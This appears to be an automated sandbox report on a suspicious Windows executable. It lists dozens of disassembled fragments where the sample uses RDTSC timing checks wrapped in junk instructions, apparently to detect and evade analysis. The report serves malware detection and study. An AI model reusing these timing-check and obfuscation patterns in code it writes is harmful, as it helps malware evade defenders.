                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA06F9 second address: DA071C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F1770B77EA8h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA071C second address: DA0720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0720 second address: DA072A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0A36 second address: DA0A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA61E4 second address: DA61F8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1770B77E96h 0x00000008 jnc 00007F1770B77E96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA61F8 second address: DA6230 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F1770F379F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007F1770F379FBh 0x00000012 pop ebx 0x00000013 popad 0x00000014 push eax 0x00000015 push ecx 0x00000016 jmp 00007F1770F37A08h 0x0000001b pop ecx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA0D6 second address: DAA0DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA0DA second address: DAA0E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3FFD second address: CF4003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA94A6 second address: DA94B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 jp 00007F1770F379F6h 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA9605 second address: DA9609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA9609 second address: DA960D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB021A second address: DB0224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F1770B77E96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0224 second address: DB022E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1770F379F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB022E second address: DB0234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0234 second address: DB0238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0375 second address: DB0393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1770B77EA6h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0684 second address: DB0690 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jne 00007F1770F379F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0690 second address: DB06A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F1770B77E96h 0x0000000a jng 00007F1770B77E96h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB07DC second address: DB07E8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jo 00007F1770F379F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB07E8 second address: DB07ED instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB07ED second address: DB0811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 jmp 00007F1770F379FBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jg 00007F1770F379FEh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0811 second address: DB0817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB097C second address: DB0984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0C56 second address: DB0C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jl 00007F1770B77E96h 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0C63 second address: DB0C68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0C68 second address: DB0C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBA66B second address: DBA683 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F1770F37A02h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBA683 second address: DBA688 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBA122 second address: DBA12D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBA12D second address: DBA131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBC9AA second address: DBC9B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBC9B3 second address: DBC9BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F1770B77E96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3818 second address: DC3839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A01h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F1770F379F6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3839 second address: DC38B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F1770B77EA6h 0x0000000d popad 0x0000000e pushad 0x0000000f jp 00007F1770B77EA6h 0x00000015 pushad 0x00000016 jmp 00007F1770B77EA6h 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F1770B77EA5h 0x00000027 jmp 00007F1770B77E9Fh 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3686 second address: DC36B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1770F37A01h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jne 00007F1770F37A03h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC36B9 second address: DC36DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F1770B77EACh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F1770B77EA4h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCB8C9 second address: DCB8D9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop ecx 0x00000008 jng 00007F1770F379FCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCB2A5 second address: DCB2B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F1770B77E96h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0B34 second address: DD0B39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0B39 second address: DD0B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD082A second address: DD083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jno 00007F1770F379F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD083A second address: DD083E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD083E second address: DD0842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDCACB second address: DDCAD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDCAD1 second address: DDCADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F1770F379F6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE4F47 second address: DE4F63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77EA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE4F63 second address: DE4F77 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1770F37A06h 0x00000008 jmp 00007F1770F379FAh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE38D0 second address: DE38D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE38D6 second address: DE38DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE3EA4 second address: DE3EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE3EAA second address: DE3EC0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F1770F379FDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE404A second address: DE4050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE415F second address: DE416E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F1770F379F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE416E second address: DE4172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE4172 second address: DE4178 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE42C2 second address: DE42FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F1770B77E96h 0x0000000a jmp 00007F1770B77EA1h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 popad 0x00000018 push esi 0x00000019 js 00007F1770B77EA0h 0x0000001f jmp 00007F1770B77E9Ah 0x00000024 push eax 0x00000025 push edx 0x00000026 push edx 0x00000027 pop edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE4CA8 second address: DE4CAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE74C2 second address: DE74C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEA29A second address: DEA29E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE9E91 second address: DE9E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE9E97 second address: DE9E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE9E9B second address: DE9EBF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F1770B77EA0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F1770B77E9Eh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE9EBF second address: DE9EC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE9EC6 second address: DE9ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F1770B77E96h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEA014 second address: DEA01E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F1770F379F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEC45B second address: DEC46B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push esi 0x00000008 push ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF9832 second address: DF9849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F1770F379FFh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF969E second address: DF96A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF96A2 second address: DF96D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F1770F37A0Ch 0x00000012 jmp 00007F1770F37A00h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF96D8 second address: DF96DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF96DC second address: DF96EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F1770F379F6h 0x0000000a jo 00007F1770F379F6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF96EC second address: DF96F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF96F0 second address: DF96FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jbe 00007F1770F379F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF6400 second address: DF642B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F1770B77EA4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c jne 00007F1770B77EAAh 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F1770B77E96h 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF642B second address: DF642F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E16E9E second address: E16EA3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E171A9 second address: E171B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jng 00007F1770F379F6h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E175E1 second address: E17606 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1770B77E9Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a ja 00007F1770B77E96h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F1770B77E9Dh 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17787 second address: E17791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1770F379F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17791 second address: E17795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17795 second address: E1779D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1779D second address: E177A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E177A3 second address: E177A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17A5A second address: E17A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17A5E second address: E17A62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17A62 second address: E17A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17A75 second address: E17A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F1770F379F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17A83 second address: E17A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17A8B second address: E17AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1770F37A06h 0x00000009 popad 0x0000000a jg 00007F1770F37A0Eh 0x00000010 jmp 00007F1770F379FCh 0x00000015 jmp 00007F1770F379FCh 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1A662 second address: E1A668 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1A8BF second address: E1A8C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1A8C5 second address: E1A8CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1A8CA second address: E1A8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1AC56 second address: E1AC9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 mov edx, 53ECE390h 0x0000000d push dword ptr [ebp+1245EF73h] 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F1770B77E98h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov edx, dword ptr [ebp+122D2926h] 0x00000033 push A7F35DE4h 0x00000038 push eax 0x00000039 push edx 0x0000003a push esi 0x0000003b pushad 0x0000003c popad 0x0000003d pop esi 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100247 second address: 510024B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510024B second address: 5100251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100251 second address: 510026B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1770F37A06h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510026B second address: 51002AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77E9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov bl, al 0x0000000f pushfd 0x00000010 jmp 00007F1770B77EA1h 0x00000015 sub cl, FFFFFFD6h 0x00000018 jmp 00007F1770B77EA1h 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51002AF second address: 51002B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
